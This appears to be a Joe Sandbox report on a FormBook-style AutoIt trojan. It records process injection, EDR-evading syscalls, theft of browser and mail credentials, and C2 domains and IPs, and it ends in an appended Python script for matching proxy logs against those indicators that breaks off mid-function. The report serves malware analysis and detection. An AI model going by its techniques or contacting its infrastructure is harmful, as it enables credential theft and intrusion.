            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | NtQueryInformationProcess: Direct from: 0x77462C26
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | NtResumeThread: Direct from: 0x77462FBC
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | NtReadFile: Direct from: 0x77462ADC
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | NtQuerySystemInformation: Direct from: 0x77462DFC
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | NtDelayExecution: Direct from: 0x77462DDC
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | NtAllocateVirtualMemory: Direct from: 0x77463C9C
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | NtClose: Direct from: 0x77462B6C
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | NtCreateUserProcess: Direct from: 0x7746371C
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | NtWriteVirtualMemory: Direct from: 0x7746490C
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | NtAllocateVirtualMemory: Direct from: 0x774648EC
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | NtQuerySystemInformation: Direct from: 0x774648CC
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | NtQueryVolumeInformationFile: Direct from: 0x77462F2C
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | NtReadVirtualMemory: Direct from: 0x77462E8C
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | NtCreateKey: Direct from: 0x77462C6C
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | NtSetInformationThread: Direct from: 0x77462B4C
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | NtQueryAttributesFile: Direct from: 0x77462E6C
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | NtDeviceIoControlFile: Direct from: 0x77462AEC
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | NtOpenSection: Direct from: 0x77462E0C
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | NtCreateFile: Direct from: 0x77462FEC
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | NtOpenFile: Direct from: 0x77462DCC
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | NtQueryInformationToken: Direct from: 0x77462CAC
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | NtTerminateThread: Direct from: 0x77462FCC
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | NtAllocateVirtualMemory: Direct from: 0x77462BEC
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | NtOpenKeyEx: Direct from: 0x77462B9C
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\clip.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: NULL target: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe protection: read write
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: NULL target: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\clip.exe | Thread register set: target process: 4524
            Source: C:\Windows\SysWOW64\clip.exe | Thread APC queued: target process: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 3080008
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A21201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A02BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A2B226 SendInput,keybd_event
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A422DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\plZuPtZoTk.exe"
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
            Source: C:\Windows\SysWOW64\clip.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A20B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A21663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
            Source: plZuPtZoTk.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: plZuPtZoTk.exe, GtDTOqzvEb.exe, 00000004.00000000.1829744795.0000000001691000.00000002.00000001.00040000.00000000.sdmp, GtDTOqzvEb.exe, 00000004.00000002.3282227189.0000000001691000.00000002.00000001.00040000.00000000.sdmp, GtDTOqzvEb.exe, 00000008.00000002.3283150825.0000000000CA1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: GtDTOqzvEb.exe, 00000004.00000000.1829744795.0000000001691000.00000002.00000001.00040000.00000000.sdmp, GtDTOqzvEb.exe, 00000004.00000002.3282227189.0000000001691000.00000002.00000001.00040000.00000000.sdmp, GtDTOqzvEb.exe, 00000008.00000002.3283150825.0000000000CA1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: GtDTOqzvEb.exe, 00000004.00000000.1829744795.0000000001691000.00000002.00000001.00040000.00000000.sdmp, GtDTOqzvEb.exe, 00000004.00000002.3282227189.0000000001691000.00000002.00000001.00040000.00000000.sdmp, GtDTOqzvEb.exe, 00000008.00000002.3283150825.0000000000CA1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
            Source: GtDTOqzvEb.exe, 00000004.00000000.1829744795.0000000001691000.00000002.00000001.00040000.00000000.sdmp, GtDTOqzvEb.exe, 00000004.00000002.3282227189.0000000001691000.00000002.00000001.00040000.00000000.sdmp, GtDTOqzvEb.exe, 00000008.00000002.3283150825.0000000000CA1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009E0698 cpuid 0_2_009E0698
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A38195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00A38195
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A1D27A GetUserNameW,0_2_00A1D27A
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009FB952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_009FB952
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009C42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_009C42DE

            Stealing of Sensitive Information

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000005.00000002.3281124203.0000000000330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1911723289.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1911428216.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.3285172725.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3283463490.0000000004280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3283258223.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1912223834.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.3282844800.0000000004B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\clip.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: plZuPtZoTk.exe | Binary or memory string: WIN_81
            Source: plZuPtZoTk.exe | Binary or memory string: WIN_XP
            Source: plZuPtZoTk.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: plZuPtZoTk.exe | Binary or memory string: WIN_XPe
            Source: plZuPtZoTk.exe | Binary or memory string: WIN_VISTA
            Source: plZuPtZoTk.exe | Binary or memory string: WIN_7
            Source: plZuPtZoTk.exe | Binary or memory string: WIN_8

            Remote Access Functionality

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000005.00000002.3281124203.0000000000330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1911723289.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1911428216.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.3285172725.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3283463490.0000000004280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3283258223.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1912223834.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.3282844800.0000000004B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A41204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00A41204
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A41806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00A41806
            MITRE ATT&CK Matrix (one row per matrix line; a number in front of a technique is the count of signatures that matched it, unnumbered cells are the unmatched techniques of the standard matrix)

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
            Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 3 Obfuscated Files or Information | NTDS | 116 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 241 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 412 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 12 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 412 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            Behavior Graph (rendered as an image in the original report; the information recoverable from it is summarised below)

            Behavior Graph ID: 1588857; Sample: plZuPtZoTk.exe; Startdate: 11/01/2025; Architecture: WINDOWS; Score: 100
            Sample-level DNS/IP: www.ngmr.xyz, www.astrafusion.xyz, 14 other IPs or domains
            Sample-level signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 4 other signatures; Performs DNS queries to domains with low reputation (www.astrafusion.xyz)
            Process chain:
            • plZuPtZoTk.exe (started) - Binary is likely a compiled AutoIt script file; Found API chain indicative of sandbox detection; Writes to foreign memory regions; 2 other signatures
            • svchost.exe (started by plZuPtZoTk.exe) - Maps a DLL or memory area into another process
            • GtDTOqzvEb.exe (injected by svchost.exe) - Found direct / indirect Syscall (likely to bypass EDR)
            • clip.exe (started by GtDTOqzvEb.exe) - Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
            • GtDTOqzvEb.exe (injected by clip.exe) - Found direct / indirect Syscall (likely to bypass EDR); contacts www.astrafusion.xyz 199.192.21.169 (ports 49742, 80; NAMECHEAP-NET US, United States), www.030002803.xyz 161.97.142.144 (ports 49730, 49731, 49732; CONTABO DE, United States) and 7 other IPs or domains
            • firefox.exe (started by clip.exe)

            Source | Detection | Scanner | Label
            plZuPtZoTk.exe | 38% | Virustotal |
            plZuPtZoTk.exe | 66% | ReversingLabs | Win32.Trojan.AutoitInject
            plZuPtZoTk.exe | 100% | Joe Sandbox ML |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1588857
Start date and time: 2025-01-11 06:29:31 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 39s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: plZuPtZoTk.exe (renamed because the original name is a hash value)
Original Sample Name: 5dd59f906130866850ab2c712dae59d43c0e0e30a6554022567957037c35dc28.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@10/9
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 45
• Number of non-executed functions: 295
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps longer than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with a delay of 100000000ms and higher are ignored
• Processes excluded from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• IPs excluded from analysis (whitelisted): 20.12.23.50
• Domains excluded from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target GtDTOqzvEb.exe, PID 5932 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded the maximum capacity and may be missing disassembly code
                                                                    No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
136.143.186.12 | ek8LkB2Cgo.exe | malicious | FormBook | www.everythlngict.org/hxjq/
136.143.186.12 | r6lOHDg9N9.exe | malicious | FormBook | www.lanxuanz.tech/tpid/
136.143.186.12 | Purchase_Order_pdf.exe | malicious | FormBook | www.lanxuanz.tech/1q08/
136.143.186.12 | jeez.exe | malicious | FormBook | www.lanxuanz.tech/m8yb/
136.143.186.12 | PURCHASE ORDER.exe | malicious | FormBook | www.lanxuanz.tech/ivo1/
136.143.186.12 | z4Shipping_document_pdf.exe | malicious | FormBook | www.lanxuanz.tech/1q08/
136.143.186.12 | NVOICE FOR THE MONTH OF AUG-24.exe | malicious | FormBook | www.lanxuanz.tech/ivo1/
136.143.186.12 | DEBIT NOTE 01ST SEP 2024.exe | malicious | FormBook | www.lanxuanz.tech/ivo1/
136.143.186.12 | PROFOMA INVOICE SHEET.exe | malicious | FormBook | www.lanxuanz.tech/ivo1/
136.143.186.12 | x.exe | malicious | FormBook | www.lanxuanz.tech/em49/
161.97.142.144 | gKvjKMCUfq.exe | malicious | FormBook | www.nb-shenshi.buzz/mz7t/
161.97.142.144 | SC_TR11670000_pdf.exe | malicious | FormBook | www.030002059.xyz/er88/
161.97.142.144 | RFQ3978 39793980.pdf.exe | malicious | FormBook | www.030002350.xyz/1a7n/
161.97.142.144 | SHIPPING DOCUMENTS_PDF.exe | malicious | FormBook | www.070001813.xyz/gn0y/
161.97.142.144 | PO2412010.exe | malicious | FormBook | www.070002018.xyz/6m2n/
161.97.142.144 | New Purchase Order.exe | malicious | FormBook | www.070001325.xyz/gebt/?INvlf=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwlqePdZlnBGcJVL9hTasAQSXzj69w==&afo=JnyH0Z2
161.97.142.144 | Quotation Validity.exe | malicious | FormBook, PureLog Stealer | www.070002018.xyz/6m2n/
161.97.142.144 | Order MEI PO IM202411484.exe | malicious | FormBook | www.030002613.xyz/xd9h/
161.97.142.144 | Documents.exe | malicious | FormBook, PureLog Stealer | www.030002449.xyz/cfqm/
161.97.142.144 | PAYMENT_TO_NFTC_(CUB)_26-11-24.doc | malicious | DarkTortilla, FormBook | www.070001955.xyz/7zj0/
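Every FormBook-tagged sample sharing an IP with this one shows the same URL shape in the context column: a www. host, a four-character path segment, and in one entry a GET query string. The following Python triage helper is an added example, not part of the Joe Sandbox report. It gives an exact-match verdict for the three hosts this report marks Malicious: true (www.030002803.xyz, www.astrafusion.xyz, www.ngmr.xyz) and a lower-confidence "shape" verdict for URLs that merely look like the observed entries. The regular expression is an assumed generalisation of what the table shows, and the proxy log lines are constructed for the example; the www.example.org/news/ line is there on purpose to show that the shape check alone produces false positives and must be treated as a lead, not a detection.

```python
import re
from urllib.parse import urlsplit

# Hosts this report lists with Malicious: true (copied from the IPs table).
REPORT_HOSTS = {"www.030002803.xyz", "www.astrafusion.xyz", "www.ngmr.xyz"}

# Assumed generalisation of the context-column entries: www.<domain>/<4 alnum>/
HOST_SHAPE = re.compile(r"^www\.[a-z0-9.-]+\.[a-z]{2,}$")
PATH_SHAPE = re.compile(r"^/[a-z0-9]{4}/$")


def classify(url: str) -> str:
    """Return 'known' (host is a report IOC), 'shape' (matches the observed
    URL form only) or 'none'. The query string is ignored on purpose: the one
    report entry that carries one still has the four-character path."""
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if host in REPORT_HOSTS:
        return "known"
    if HOST_SHAPE.match(host) and PATH_SHAPE.match(parts.path):
        return "shape"
    return "none"


# Constructed proxy log (not from the report): "<time> <client> <method> <url> <status>"
PROXY_LOG = """\
2025-01-11T06:30:01Z 10.0.0.5 GET http://www.030002803.xyz/gn0y/?INvlf=abc 404
2025-01-11T06:30:02Z 10.0.0.5 POST http://www.astrafusion.xyz/q7m2/ 200
2025-01-11T06:30:03Z 10.0.0.7 GET http://www.example.org/news/ 200
2025-01-11T06:30:04Z 10.0.0.7 GET http://www.somehost.top/k3x9/ 200
2025-01-11T06:30:05Z 10.0.0.9 GET https://update.example.com/api/v1/ping 200
"""


def scan_proxy_log(text: str) -> list[tuple[str, str, str]]:
    """Yield (client, host, verdict) for every line that is not 'none'."""
    hits = []
    for line in text.splitlines():
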